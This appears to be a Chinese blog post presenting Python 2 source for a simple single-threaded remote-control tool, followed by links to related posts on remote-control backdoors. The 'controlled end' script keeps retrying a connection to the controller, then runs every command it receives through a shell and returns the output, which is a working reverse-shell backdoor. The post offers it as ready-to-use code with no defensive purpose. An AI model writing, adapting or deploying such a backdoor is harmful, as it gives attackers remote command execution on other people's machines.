1. 技术:管道通信,流文件处理,socket基础

2. Tips:

默认IP:127.0.0.1

默认端口:7676

3. 代码样例

服务端

#!/usr/bin/env python

# encoding: utf-8  

import socket

import sys

from os import *

reload(sys)

sys.setdefaultencoding("utf-8")  

def socketInit():

	s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

	return s

def socketDeal(s,HOST,PORT):

	s.bind((HOST,PORT))

	s.listen(1)

def ControlModule(sS,addr):

	recv_buffer = sS.recv(20048)

	if recv_buffer == "[-]Error:Server is OFF" or recv_buffer == "[*]Server is OFF":

		print recv_buffer

		sys.exit(0)

	else:

		print recv_buffer

	send_buf = raw_input(addr[0]+">")

	sS.send(send_buf)

def main():

	HOST = "127.0.0.1"

	PORT = 7676

	s = socketInit()

	socketDeal(s, HOST, PORT)

	sS,addr = s.accept()

	print "Connect from " + addr[0] + ":" + repr(addr[1])

	try:

		while True:

			ControlModule(sS,addr)

	except Exception as e:

		print "[-]Connect Error"

		sS.close()

		s.close()

		sys.exit(-1)

	except KeyboardInterrupt:

		sS.close()

		s.close()

		sys.exit(0)

if __name__ == '__main__':

	main()

受控端:

#!/usr/bin/env python

# encoding: utf-8  

import socket

import sys

import re

import traceback

import tempfile

from os import *

from subprocess import *

reload(sys)

sys.setdefaultencoding("utf-8")  

def socketInit():

	s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

	return s

def socketConn(s,HOST,PORT):

	while True:

		try:

			s.connect((HOST,PORT))

		except Exception as e:

			continue

		else:

			s.send("Welcome Sir ~")

			break

def String_Deal(recv,send):

	P_str = re.findall("cd(.*)|(\w):", recv)

	if P_str!=[] and send == "":

		if P_str[0][0]!="":

			try:

				chdir(P_str[0][0].strip())

			except Exception as e:

				flag = -1

			else:

				flag = 1

		else:

			try:

				chdir(recv)

			except Exception as e:

				#traceback.print_exc()

				flag = -1

			else:

				flag = 1

	else:

		if send == "":

			flag = 1

		else:

			flag = 0

	return flag

def OpenProcess(s):

	try:

		while True:

			recv_buf = s.recv(2048)

			#流文件技术,防止管道阻塞

			out_temp = tempfile.SpooledTemporaryFile(bufsize=10*1000)

			fileNo = out_temp.fileno()

			cmd = Popen(recv_buf, shell=True,stdin=PIPE, stdout=fileNo, stderr=STDOUT)

			cmd.wait()

			out_temp.seek(0)

			send_buf = out_temp.read()

			#print len(send_buf)

			#输入命令字符串处理识别

			flag = String_Deal(recv_buf,send_buf)

			if flag == 1:

				s.send("OK")

			elif flag == -1:

				s.send("Error!!")

			else:

				s.send(send_buf)

			send_buf = ""

	except Exception as e:

		try:

			s.send("[-]Error:Server is OFF")

		except Exception as e:

			pass

			s.close()

		sys.exit(-1)

	except KeyboardInterrupt:

		try:

			s.send("[*]Server is OFF")

		except Exception as e:

			pass

		s.close()

		sys.exit(0)

def main():

	flag = 0

	HOST = "127.0.0.1"

	PORT = 7676

	s = socketInit()

	socketConn(s, HOST, PORT)

	OpenProcess(s)

if __name__ == '__main__':

	main()

Python简易远控(单线程版)的更多相关文章

  1. python构造远控

    server端: import socket import subprocess server=socket.socket() server.bind(('127.0.0.1',4444)) serv ...

  2. python+msf 制作 windows远控

    最近分析的一个远控,后发现是meterpreter rever http shell,文件是个打包的python(打包成exe),感谢wstone的指导~ 创建dll ./msfpayload win ...

  3. Python解决网吧收费系统,远控网吧电脑设备!

    python破解网吧收费系统,远控网吧电脑设备! 很多人学习python,不知道从何学起.很多人学习python,掌握了基本语法过后,不知道在哪里寻找案例上手.很多已经做案例的人,却不知道如何去学习更 ...

  4. python破解网吧收费系统,远控网吧电脑设备!

      我今天呢 , 我就没事跟着朋友喝酒喝酒啊.喝了很多啊.晚上到旁边的酒店开了一个房间,到了酒店才十点! 感觉没啥事情干的,那就去网吧走走看把,看到是一个嘟嘟牛的,和上次是一样的.还是照常用MS170 ...

  5. 【Python】nvshens按目录批量下载图片爬虫1.00(单线程版)

    # nvshens按目录批量下载图片爬虫1.00(单线程版) from bs4 import BeautifulSoup import requests import datetime import ...

  6. 2016款MACBOOK PRO触控条版 安装WIN10初体验 及 无奈退货记

    新的2016MBP终于发布了,作为把苹果电脑装WIN使用的人,等候很久之后,终于可以行动了. 黄山松 (Tom Huang) 发表于博客园http://www.cnblogs.com/tomview/ ...

  7. Python3实现ICMP远控后门(上)

    这几天一直在研究远控木马的一些通信协议,比如TCP,UDP,ICMP,DNS,HTTP等等,对于TCP,UDP这两种就不讲解了,因为太常见了. 大家可能对采用ICMP,DNS的木马不是很熟悉,其实这两 ...

  8. Python3实现ICMP远控后门(上)_补充篇

    ICMP后门(上)补充篇 前言 在上一篇文章Python3实现ICMP远控后门(上)中,我简要讲解了ICMP协议,以及实现了一个简单的ping功能,在文章发表之后,后台很多朋友留言,说对校验和的计算不 ...

  9. Python3实现ICMP远控后门(中)之“嗅探”黑科技

    ICMP后门 前言 第一篇:Python3实现ICMP远控后门(上) 第二篇:Python3实现ICMP远控后门(上)_补充篇 在上两篇文章中,详细讲解了ICMP协议,同时实现了一个具备完整功能的pi ...

随机推荐

  1. Redis单机数据库的实现原理

    本文主要介绍Redis的数据库结构,Redis两种持久化的原理:RDB持久化.AOF持久化,以及Redis事件分类及执行原理.最后,分别介绍了单机班Redid客户端和Redis服务器的使用和实现原理. ...

  2. Linux速通 大纲

    1.Linux操作系统安装及初始化配置(熟悉) 2.Linux操作系统目录组成结构及文件级增删改查操作(重点) 3.Linux操作系统用户.权限管理(重点) 4.开源软件及Linux下软件包的管理(重 ...

  3. 为什么是InfluxDB | 写在《InfluxDB原理和实战》出版之际

    1年前写的一篇旧文,文中的分析,以及探讨的问题和观点,至今仍有意义. 从2016年起,笔者在腾讯公司负责QQ后台的海量服务分布式组件的架构设计和研发工作,例如微服务开发框架SPP.名字路由CMLB.名 ...

  4. HDU_6695 Welcome Party 【思维】

    一.题目 Welcome Party 二.分析 最开始的时候分析错了,认为只要找两个类型中的最小差值就可以了,忽略了是求两个类型中最大值的最小差值. 那么可以对第一个类型进行从大到小排序,枚举这个类型 ...

  5. 解决无法通过浏览器访问docker成功安装rabbitMQ后页面问题

    我发现了问题后,花了两天的时间解决了这个问题. 一.测试在docker本机中使用curl "ip地址:端口" 查看是否能访问成功,结果是没问题,排除了docker安装失败的问题 二 ...

  6. C# yield return 原理探究

    天需要些一个小工具,需要使用到多线程读写程序集,接口方法返回值类型需要为"IEnumerable<string>"这里用到了"yield return&quo ...

  7. Django使用数据库(配置数据库,基本的增删改查a)

    第一步在setting文件中配置DATABASES设置 然后更改__init__文件 打开APP中models文件,导入并创建数据库 最后打开终端执行以下命令 python manage.py mak ...

  8. Centos7下安装JDK详细过程记录

    1.查询系统是否安装了java: [root@bogon ~]# java -version 根据上图显示,系统默认安装了Openjdk,它和我们使用的java jdk有些区别(具体的可度娘),所以需 ...

  9. 全面了解Vue3的 reactive 和相关函数

    Vue3的 reactive 怎么用,原理是什么,官网上和reactive相关的那些函数又都是做什么用处的?这里会一一解答. ES6的Proxy Proxy 是 ES6 提供的一个可以拦截对象基础操作 ...

  10. 【wp】2021MAR-DASCTF_逆向

    昨天打完的MAR DASCTF,来复个盘~ 不过就re做了3/4然后有事提前开溜了hhh,拿了drinkSomeTea和replace的三血心满意足(蜜汁三血执念. 感觉这回的出题人好喜欢TEA啊(正 ...